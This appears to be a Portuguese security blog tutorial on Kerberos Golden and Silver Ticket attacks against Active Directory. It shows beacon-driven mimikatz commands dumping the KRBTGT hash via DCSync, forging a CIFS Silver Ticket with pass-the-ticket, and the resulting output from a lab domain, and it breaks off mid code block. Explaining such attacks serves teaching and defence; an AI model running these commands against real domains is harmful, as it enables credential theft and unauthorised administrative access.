<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Golden & Silver | ZeroDay Ranch</title><meta name="generator" content="Jekyll v4.0.0" /><meta property="og:title" content="Golden &amp; Silver" /><meta name="author" content="tuxtrack" /><meta property="og:locale" content="en_US" /><meta name="description" content="Como mostrado no post anterior, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão." /><meta property="og:description" content="Como mostrado no post anterior, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão." /><link rel="canonical" href="http://localhost:4000/posts/g&s/" /><meta property="og:url" content="http://localhost:4000/posts/g&s/" /><meta property="og:site_name" content="ZeroDay Ranch" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-03-02T20:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Golden &amp; Silver" /><meta name="twitter:site" content="@tuxtrack" /><meta name="twitter:creator" content="@tuxtrack" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"tuxtrack"},"url":"http://localhost:4000/posts/g&s/","headline":"Golden &amp; Silver","dateModified":"2020-03-02T20:00:00+08:00","datePublished":"2020-03-02T20:00:00+08:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/g&s/"},"description":"Como mostrado no post anterior, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão.","@type":"BlogPosting","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/main.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/main.css"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script> window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>'); </script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous" async></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="style" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/syntax.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/syntax.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">ZeroDay Ranch</a></div><div id="site-subtitle" class="font-italic">Hacking stuff directly from sertão.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>BLOG</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/zdr/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>ZERODAY RANCH</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/tuxtrack" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/tuxtrack" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="javascript:window.open('mailto:' + ['tuxtrack','hacknroll.com'].join('@'))"> <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" target="_blank"> <i class="fas fa-rss"></i> </a></div></div><div id="main-wrapper"> <!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Golden & Silver</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Golden & Silver</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Mon, Mar 2, 2020, 8:00 PM +0800"> Mar 2, 2020 <i class="unloaded">2020-03-02T20:00:00+08:00</i> </span></div></div><div class="post-content"><p>Como mostrado no <a href="https://tuxtrack.github.io/kerberos101/">post anterior</a>, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/sample/ges/kerb.png" alt="" /></p><p>Ao ocorrer a solicitação de acesso a algum recurso existente no domínio utilizando o protocolo Kerberos, automaticamente será solicitado ao KDC um ticket do tipo TGT (Ticket-Granting Ticket). Caso a conta seja válida, o KDC retornará o ticket assinado/criptografado pela conta KRBTGT.</p><blockquote><p>KRBTGT is also the security principal name used by the KDC for a Windows Server domain, as specified by RFC 4120. The KRBTGT account is the entity for the KRBTGT security principal, and it is created automatically when a new domain is created. <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn745899(v=ws.11)">MS Docs</a></p></blockquote><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/sample/ges/krbtgt.png" alt="" /></p><h3 id="golden-tickets">Golden Tickets</h3><p>O problema de segurança ocorre quando o hash da conta KRBTGT é comprometido. Nesse momento, o atacante pode forjar TGT’s, assinando-os com o hash obtido e se utilizar de qualquer conta presente no domínio (forjada) empoderando-se dos privilégios concedidos as mesmas ou adicionando novos privilégios alterando a estrutura do ticket.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/sample/ges/gt.png" alt="" /></p><ul><li>Forging Golden Tickets</li></ul><p>O ataque em questão foi apresentado por Benjamin Delpy, mais conhecido como <a href="https://twitter.com/gentilkiwi">@gentilkiwi</a>. Ele é o criador das famosas ferramentas <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a> e <a href="https://github.com/gentilkiwi/kekeo">Kekeo</a>, amplamente utilizadas por todos no mundo offsec.</p><p>Para efeitos de demonstração, foi utilizado a ferramenta Mimikatz para a execução do ataque. Existem outras ferramentas que podem auxiliar na tarefa, como o projeto <a href="https://github.com/GhostPack/Rubeus">Rubeos</a>, presente na toolkit <a href="https://github.com/GhostPack/">GhostPack</a>, projeto da SpecterOps criado para portar a maioria das ferramentas que antes eram escritas em Powershell para C#. Após as <a href="https://devblogs.microsoft.com/powershell/powershell-the-blue-team/">melhorias de seguranças aplicadas a partir da versão 5 do Powershell</a>, muitos ataques começaram a ser bloqueados, causando desconforto para os analistas. Mas isso é história para outro blog post.</p><p>Para que o Mimikatz possa executar o ataque, são necessários alguns bits de informação:</p><p>User: Usuário no qual o atacante deseja obter iguais privilégios.</p><p>Domain Name: FQDN <a href="https://en.wikipedia.org/wiki/Fully_qualified_domain_name">(Fully Qualified Domain Name)</a></p><p>Domain SID: Domain SID</p><p>KRBTGT NTLM Hash: Hash extraído do usuário KRBTGT.</p><p>Como mencionado, o atacante poderá alterar a estrutura do ticket, adicionando outras informações utilizando os parâmetros “/groups:” e “id”, para fornecer informções sobre grupos (Grupos com poderes administrativos: 512,513,518,519,520 ) e RID’s.</p><p>O processo de extração do hash da conta KRBTGT pode ser realizado de diversas formas, para mais informações, recomendo a leitura do blog post <a href="https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/">Dumping Domain Password Hashes</a>.</p><p>Processo de obtenção do hash através de <a href="https://adsecurity.org/?p=1729">DCSYNC Attack</a>.</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="nf">beacon</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">dcsync</span><span class="w"> </span><span class="nx">hnr.local</span><span class="w"> </span><span class="nx">krbtgt</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="nf">Tasked</span><span class="w"> </span><span class="nx">beacon</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">run</span><span class="w"> </span><span class="nx">mimikatz</span><span class="s1">'s @lsadump::dcsync /domain:hnr.local /user:krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] '</span><span class="nx">hnr.local</span><span class="s1">' will be the domain
[DC] '</span><span class="nx">GOKU.hnr.local</span><span class="s1">' will be the DC server
[DC] '</span><span class="nx">krbtgt</span><span class="s1">' will be the user account
Object RDN           : krbtgt
** SAM ACCOUNT **
SAM Username         : KRBTGT  
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 11/02/2020 00:41:33
Object Security ID   : S-1-5-21-45967290-1955130809-1078885739-502
Object Relative ID   : 502
Credentials:
  Hash NTLM: 86db69b9000654a8a4d4b6abe6ed1553
</span></pre></table></code></div></div><p>Com as informações necessárias em mãos, a execução do ataque pode ser concluída.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/sample/ges/mimi.png" alt="" /></p><p>Com a execução do mimikatz, o ticket para o usuário ganderson foi forjado e submetido na sessão atual utilizando um ataque chamado Pass-The-Ticket, parametro “/ptt” (Devo criar um outro blog post mostrando como funciona o Pass-the-ticket e Over Pass the Hash).</p><hr /><h3 id="silver-tickets">Silver Tickets</h3><p>Silver Tickets seguem a mesma ideia do Golden Ticket, porém, forjando um TGS (Service Ticket) em vez do TGT. Os tickets são criados utilizando a conta do computador ou conta de serviço do recurso que o atacante deseja acessar. As informações sobre o usuário, grupo e etc podem ser forjadas sem a necessidade de nenhuma troca de informação entre User Workstation e KDC.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/sample/ges/st.png" alt="" /></p><p>Por padrão, as senhas das contas dos computadores são alteradas a cada 30 dias. Logo, o hash da conta pode ser alterado em meio ao projeto, causando perda de acesso. Para contornar o “problema”, é possível solicitar a informação sobre a máquina alvo e verificar o tempo limite até a senha ser alterada novamente.</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="nf">beacon</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">powerpick</span><span class="w"> </span><span class="nx">Get-NetComputer</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="nx">SQL</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="nf">Select</span><span class="w"> </span><span class="nx">name</span><span class="p">,</span><span class="w"> </span><span class="nx">samaccounttype</span><span class="p">,</span><span class="w"> </span><span class="nx">pwdlastset</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="nf">Tasked</span><span class="w"> </span><span class="nx">beacon</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">run:</span><span class="w"> </span><span class="nx">Get-NetComputer</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="nx">SQL</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="nf">Select</span><span class="w"> </span><span class="nx">name</span><span class="p">,</span><span class="w"> </span><span class="nx">samaccounttype</span><span class="p">,</span><span class="w"> </span><span class="nx">pwdlastset</span><span class="w"> </span><span class="p">(</span><span class="nf">unmanaged</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">host</span><span class="w"> </span><span class="nx">called</span><span class="w"> </span><span class="nx">home</span><span class="p">,</span><span class="w"> </span><span class="nx">sent:</span><span class="w"> </span><span class="nx">133715</span><span class="w"> </span><span class="nx">bytes</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">received</span><span class="w"> </span><span class="nx">output:</span><span class="w">

</span><span class="nf">name</span><span class="w">  </span><span class="nx">samaccounttype</span><span class="w"> </span><span class="nx">pwdlastset</span><span class="w">         
</span><span class="nf">----</span><span class="w">  </span><span class="nf">--------------</span><span class="w"> </span><span class="nf">----------</span><span class="w">         
</span><span class="nx">SQL</span><span class="w">  </span><span class="nx">MACHINE_ACCOUNT</span><span class="w"> </span><span class="nx">12/02/2020</span><span class="w"> </span><span class="nx">14:53:05</span><span class="w">
</span></pre></table></code></div></div><p>Caso um usuário tente acessar um recurso no qual o mesmo não possui autorização, a negação do acesso é automaticamente efetuada. Para fins de demonstração, foi solicitado o acesso ao serviço de compartilhamento por um usuário que propositalmente não possui privilégios para tal.</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="nf">beacon</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">shell</span><span class="w"> </span><span class="nx">dir</span><span class="w"> </span><span class="nx">\\SQL.hnr.local\c</span><span class="err">$</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="nf">Tasked</span><span class="w"> </span><span class="nx">beacon</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">run:</span><span class="w"> </span><span class="nx">dir</span><span class="w"> </span><span class="nx">\\SQL.hnr.local\c</span><span class="err">$</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">host</span><span class="w"> </span><span class="nx">called</span><span class="w"> </span><span class="nx">home</span><span class="p">,</span><span class="w"> </span><span class="nx">sent:</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">bytes</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">received</span><span class="w"> </span><span class="nx">output:</span><span class="w">
</span><span class="nf">Access</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">denied.</span><span class="w">
</span></pre></table></code></div></div><p>Para forjar um Silver Ticket, algumas informações adicionais são necessárias:</p><p>Taget: FQDN <a href="https://en.wikipedia.org/wiki/Fully_qualified_domain_name">(Fully Qualified Domain Name)</a></p><p>Service: Serviço no qual deseja obter acesso (PS-Remoting, WMI, Scheduled Tasks, CIFS, LDAP, WINRM…)</p><p>rc4: NTLM Hash do computador/serviço, usado para assinar os tickets de serviço.</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre><td class="rouge-code"><pre><span class="nf">beacon</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">mimikatz</span><span class="w"> </span><span class="nx">kerberos::golden</span><span class="w"> </span><span class="nx">/domain:hnr.local</span><span class="w"> </span><span class="nx">/user:admin</span><span class="w"> </span><span class="nx">/sid:S-1-5-21-45967290-1955130809-1078885739</span><span class="w"> </span><span class="nx">/target:SQL.hnr.local</span><span class="w"> </span><span class="nx">/service:CIFS</span><span class="w"> </span><span class="nx">/rc4:95e93eb10b58109a6b0227d8c821dbdd</span><span class="w"> </span><span class="nx">/ptt</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="nf">Tasked</span><span class="w"> </span><span class="nx">beacon</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">run</span><span class="w"> </span><span class="nx">mimikatz</span><span class="s1">'s kerberos::golden /domain:hnr.local /user:admin /sid:S-1-5-21-45967290-1955130809-1078885739 /target:SQL.hnr.local /service:CIFS /rc4:95e93eb10b58109a6b0227d8c821dbdd /ptt command
[+] host called home, sent: 998474 bytes
[+] received output:
User      : admin
Domain    : hnr.local (HNR)
SID       : S-1-5-21-45967290-1955130809-1078885739
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 95e93eb10b58109a6b0227d8c821dbdd - rc4_hmac_nt      
Service   : CIFS
Target    : SQL.hnr.local
Lifetime  : 01/03/2020 18:39:26 ; 27/02/2030 18:39:26 ; 27/02/2030 18:39:26
-&gt; Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for '</span><span class="nx">admin</span><span class="w"> </span><span class="err">@</span><span class="w"> </span><span class="nx">hnr.local</span><span class="s1">' successfully submitted for current session
</span></pre></table></code></div></div><p>Utilizando a ferramenta klist, podemos confirmar que os tickets injetados permanecem armazenados em cache.</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre><td class="rouge-code"><pre><span class="nf">beacon</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">shell</span><span class="w"> </span><span class="nx">klist</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="nf">Tasked</span><span class="w"> </span><span class="nx">beacon</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">run:</span><span class="w"> </span><span class="nx">klist</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">host</span><span class="w"> </span><span class="nx">called</span><span class="w"> </span><span class="nx">home</span><span class="p">,</span><span class="w"> </span><span class="nx">sent:</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">bytes</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">received</span><span class="w"> </span><span class="nx">output:</span><span class="w">

</span><span class="nf">Current</span><span class="w"> </span><span class="nx">LogonId</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">0:0x51f1d</span><span class="w">

</span><span class="c">#0&gt;	Client: jbolsonaro @ HNR.LOCAL</span><span class="w">
	</span><span class="nf">Server:</span><span class="w"> </span><span class="nx">krbtgt/HNR.LOCAL</span><span class="w"> </span><span class="err">@</span><span class="w"> </span><span class="nx">HNR.LOCAL</span><span class="w">
	</span><span class="nf">KerbTicket</span><span class="w"> </span><span class="nx">Encryption</span><span class="w"> </span><span class="nx">Type:</span><span class="w"> </span><span class="nx">AES-256-CTS-HMAC-SHA1-96</span><span class="w">
	</span><span class="nf">Ticket</span><span class="w"> </span><span class="nx">Flags</span><span class="w"> </span><span class="nx">0x60a10000</span><span class="w"> </span><span class="nf">-</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">forwardable</span><span class="w"> </span><span class="nx">forwarded</span><span class="w"> </span><span class="nx">renewable</span><span class="w"> </span><span class="nx">pre_authent</span><span class="w"> </span><span class="nx">name_canonicalize</span><span class="w"> 
	</span><span class="nx">Start</span><span class="w"> </span><span class="nx">Time:</span><span class="w"> </span><span class="nx">3/2/2020</span><span class="w"> </span><span class="nx">13:56:50</span><span class="w"> </span><span class="p">(</span><span class="nf">local</span><span class="p">)</span><span class="w">
	</span><span class="kr">End</span><span class="w"> </span><span class="nf">Time:</span><span class="w">   </span><span class="nx">3/2/2020</span><span class="w"> </span><span class="nx">23:41:06</span><span class="w"> </span><span class="p">(</span><span class="nf">local</span><span class="p">)</span><span class="w">
	</span><span class="nf">Renew</span><span class="w"> </span><span class="nx">Time:</span><span class="w"> </span><span class="nx">3/8/2020</span><span class="w"> </span><span class="nx">18:11:06</span><span class="w"> </span><span class="p">(</span><span class="nf">local</span><span class="p">)</span><span class="w">
	</span><span class="nf">Session</span><span class="w"> </span><span class="nx">Key</span><span class="w"> </span><span class="nx">Type:</span><span class="w"> </span><span class="nx">AES-256-CTS-HMAC-SHA1-96</span><span class="w">
	</span><span class="nf">Cache</span><span class="w"> </span><span class="nx">Flags:</span><span class="w"> </span><span class="nx">0x2</span><span class="w"> </span><span class="nf">-</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">DELEGATION</span><span class="w"> 
	</span><span class="nx">Kdc</span><span class="w"> </span><span class="nx">Called:</span><span class="w"> </span><span class="nx">GOKU.hnr.local</span><span class="w">

</span><span class="c">#1&gt;	Client: jbolsonaro @ HNR.LOCAL</span><span class="w">
	</span><span class="nf">Server:</span><span class="w"> </span><span class="nx">host/sql.hnr.local</span><span class="w"> </span><span class="err">@</span><span class="w"> </span><span class="nx">HNR.LOCAL</span><span class="w">
	</span><span class="nf">KerbTicket</span><span class="w"> </span><span class="nx">Encryption</span><span class="w"> </span><span class="nx">Type:</span><span class="w"> </span><span class="nx">AES-256-CTS-HMAC-SHA1-96</span><span class="w">
	</span><span class="nf">Ticket</span><span class="w"> </span><span class="nx">Flags</span><span class="w"> </span><span class="nx">0x40a10000</span><span class="w"> </span><span class="nf">-</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">forwardable</span><span class="w"> </span><span class="nx">renewable</span><span class="w"> </span><span class="nx">pre_authent</span><span class="w"> </span><span class="nx">name_canonicalize</span><span class="w"> 
	</span><span class="nx">Start</span><span class="w"> </span><span class="nx">Time:</span><span class="w"> </span><span class="nx">3/1/2020</span><span class="w"> </span><span class="nx">18:11:06</span><span class="w"> </span><span class="p">(</span><span class="nf">local</span><span class="p">)</span><span class="w">
	</span><span class="kr">End</span><span class="w"> </span><span class="nf">Time:</span><span class="w">   </span><span class="nx">3/2/2020</span><span class="w"> </span><span class="nx">4:11:06</span><span class="w"> </span><span class="p">(</span><span class="nf">local</span><span class="p">)</span><span class="w">
	</span><span class="nf">Renew</span><span class="w"> </span><span class="nx">Time:</span><span class="w"> </span><span class="nx">3/8/2020</span><span class="w"> </span><span class="nx">18:11:06</span><span class="w"> </span><span class="p">(</span><span class="nf">local</span><span class="p">)</span><span class="w">
	</span><span class="nf">Session</span><span class="w"> </span><span class="nx">Key</span><span class="w"> </span><span class="nx">Type:</span><span class="w"> </span><span class="nx">AES-256-CTS-HMAC-SHA1-96</span><span class="w">
	</span><span class="nf">Cache</span><span class="w"> </span><span class="nx">Flags:</span><span class="w"> </span><span class="nx">0</span><span class="w"> 
	</span><span class="nf">Kdc</span><span class="w"> </span><span class="nx">Called:</span><span class="w"> </span><span class="nx">GOKU.hnr.local</span><span class="w">
</span></pre></table></code></div></div><p>Como pode-se notar, após submeter o Silver Ticket na sessão para o serviço <a href="https://pt.wikipedia.org/wiki/Server_Message_Block">CIFS</a>, o acesso ao compartilhamento foi concedido, demonstrando a perfeita execução do ataque.</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="nf">beacon</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">shell</span><span class="w"> </span><span class="nx">dir</span><span class="w"> </span><span class="nx">\\SQL.hnr.local\c</span><span class="err">$</span><span class="w">
